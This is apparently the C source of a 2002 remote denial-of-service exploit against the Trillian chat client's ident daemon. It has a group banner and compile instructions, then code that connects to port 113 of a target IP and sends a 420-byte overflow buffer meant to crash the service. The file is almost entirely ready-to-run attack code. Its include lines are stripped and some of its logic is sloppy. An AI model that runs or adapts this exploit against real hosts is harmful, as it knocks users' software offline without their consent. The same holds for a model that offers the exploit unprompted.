/* Trillian .74, .73 remote DoS.. Trillian Pro 1.0 * Exploits buffer overflow in ident when sending over * 418 bytes. * * Really only works if people are on IRC (otherwise, the ident * daemon shuts down.. And you've got to know they are running * Trillian, obviously. * * bug discovered by Lance Fitz-Herbert (aka phrizer) on 03 September 2002 * * * Compile With: * Linux: gcc -o trillident trillident.c * Solaris: gcc -o trillident trillident.c -lsocket -lnsl * Windows: Download trillident.exe, or compile as normal, with GNU getopt ZZZZZZZZZZZZZZZZZZZ Z:::::::::::::::::Z nnnn nnnnnnnn Z:::::::::::::::::Z ooooooooooo n:::nn::::::::nn Z:::ZZZZZZZ::::::Z oo:::::::::::oo eeeeeeeeeee n::::::::::::::nn ZZZZZ * Z::::::Z o:::::::::::::::o ee:::::::::::eenn:::::::::::::::n 2 Z:::::Z o:::::ooooo:::::o e:::::::::::::::een:::::nnnn:::::n 0 Z:::::Z o::::o o::::o e::::::eeeee::::::en::::n n::::n 0 Z:::::Z o::::o o::::o e:::::e e:::::en::::n n::::n 2 Z:::::Z o::::o o::::o e::::::eeeee::::::en::::n n::::n * Z:::::Z o::::o o::::o e::::::::::::::::e n::::n n::::n Z:::::Z o:::::ooooo:::::o e:::::eeeeeeeeeee n::::n n::::nZZZ:::::Z ZZZZZo:::::::::::::::o e::::::e n::::n n::::nZ::::::ZZZZZZZZ:::Z oo:::::::::::oo e:::::::e nnnnnn nnnnnnZ:::::::::::::::::Z ooooooooooo e:::::::eeeeeeeeee Z:::::::::::::::::Z ee::::::::::::::e ZZZZZZZZZZZZZZZZZZZ ee:::::::::::::e \... www.enZotech.net .../ eeeeeeeeeeeeee */ #ifdef _WIN32 #include #include #include #include "getopt.h" #else #include #include #include #include #include #include #include #include #include #include #include #endif #define ERR -1 void usage(char* argv0); int dostrill(char *ip, int port); int main(int argc, char *argv[]) { extern int optopt; extern char *optarg; int errorflag = 0; /* did someone screw up? */ int port = 113; /* default port to use unless -p */ int c; #ifdef _WIN32 WORD werd; WSADATA wd; werd=MAKEWORD(2,0); WSAStartup(werd,&wd); #endif if ((argc < 2) || (argc > 6)) usage(argv[0]); while ((c=getopt(argc, argv, "vp:")) != EOF) { switch(c) { case 'p': fprintf(stderr, "Using port %s\n", optarg); port = strtol(optarg, NULL, 10); break; case 'v': fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n"); exit(0); case ':': fprintf(stderr, "Option -%c requires an operand\n", optopt); errorflag++; break; case '?': fprintf(stderr, "Unrecognized option: -%c\n", optopt); errorflag++; } } if (errorflag) { usage(argv[0]); } /* kill them */ dostrill(argv[argc-1], port); fprintf(stderr, "Finished!\n"); return 0; } /* end main */ void usage(char* argv0) { fprintf(stderr, "Trillian Ident DoS - [Sep 19, 2002]\n"); fprintf(stderr, "Usage: %s [options] IP\n\n", argv0); fprintf(stderr, "-p \tPort to use\n" "-v \tPrint the program info\n"); exit(1); } int dostrill(char *ip, int port) { int s, r; char buf[420]; struct sockaddr_in addr; struct hostent *hp; memset((char *) &addr, '\0', sizeof(addr)); addr.sin_family = AF_INET; addr.sin_addr.s_addr = inet_addr(ip); addr.sin_port = htons(port); memset(buf, 'A', 420); if ((hp = gethostbyname(ip)) != NULL) { if (hp->h_length > sizeof(addr.sin_addr)) { hp->h_length = sizeof(addr.sin_addr); } memcpy((char *) &addr.sin_addr, hp->h_addr, hp->h_length); } else { if ((addr.sin_addr.s_addr = inet_addr(ip)) < 0) { return(0); } } s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); if (s == ERR) { fprintf(stderr, "Couldn't Create Socket\n"); return 1; } r = connect(s, (struct sockaddr *) &addr, sizeof(addr)); if (r == ERR) { fprintf(stderr, "Couldn't Establish Connection\n"); return 1; } fprintf(stderr, "Connected to %s and sending buffer\n\n", ip); #ifdef _WIN32 send(s,buf,strlen(buf),0); #else write(s, buf, strlen(buf)); /* send buffer */ #endif #ifdef _WIN32 closesocket(s); #else close(s); #endif return 0; }